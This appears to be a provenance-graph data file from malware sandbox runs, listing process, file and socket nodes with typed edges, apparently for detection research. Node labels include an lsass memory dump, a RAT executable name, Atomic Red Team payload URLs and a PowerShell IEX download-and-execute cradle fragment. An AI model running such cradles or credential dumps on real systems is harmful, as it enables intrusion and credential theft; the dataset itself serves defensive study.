26
MP-build3.exe 
MF-%tmp%\lsass.DMP
SO-https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
SF-C:\Users\admin\AppData\Local\Temp\ma
MP*-WsatConfig.exe
MF-C:\Users\admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt
MF-C:\Windows\Temp\Crashpad\attachments\IMEDICTUPDATE.exe
TP-ipconfig.exe
MP*-untitled boxing game Good - Linkvertise Downloader_ns-hSm1.exe 
MP*-Orcus.exe 
SF-C:\Windows\SysWow64\regsvr32.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
TF-C:\Users\admin\Desktop\0IuqaJTsFmOw8k4.exe
MP-msedge.exe
MP*-INV 88000354.exe 
MF-C:\Users\admin\AppData\Local\Temp\tmp6B8.tmp
MF-Files\VideoLAN\VLC\vlc.exe
MF-RemoteCertTrust.ps1
MF-C:\Users\admin\AppData\Local\Temp\sample
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-863e7c22c771e4005197ae28363584f8.exe 
TP-Powershell.exe
MF-C:\Users\admin\AppData\Local\Temp\Protected
MF-\Users\admin\AppData\Roaming\file.exe
MF-C:\Users\admin\Desktop\List
MP-Client.exe 
61
0 1 WR-1
0 2 ST-1
0 3 UK-1
4 1 WR-1
4 2 ST-1
4 5 RD-1
4 6 WR-1
7 1 RD-1
2 7 RF-1
4 7 UK-1
8 1 WR-2
2 8 RF-1
8 5 EX-2
8 6 WR-2
9 1 WR-3
9 2 ST-3
9 5 WR-3
9 6 WR-3
8 10 EX-2
9 10 RD-3
8 11 ST-2
9 11 ST-3
8 12 RD-2
9 12 RD-3
13 5 EX-3
13 6 WR-3
8 13 UK-2
14 5 RD-4
14 6 WR-4
14 10 RD-4
14 11 ST-4
14 12 WR-4
9 15 EX-3
14 15 WR-4
9 16 RD-3
14 16 CD-4
9 17 WR-3
14 17 WR-4
9 18 RD-3
14 18 RD-4
9 19 ST-3
19 14 RF-3
20 10 RD-4
11 20 RF-3
20 12 UK-4
21 11 ST-4
14 21 IJ-4
21 15 WR-4
21 16 WR-4
21 17 EX-4
21 18 UK-4
14 22 RD-4
14 23 RD-4
14 24 WR-4
25 15 WR-4
25 16 WR-4
25 17 WR-4
19 25 RF-3
25 22 CD-4
25 23 WR-4
25 24 UK-4

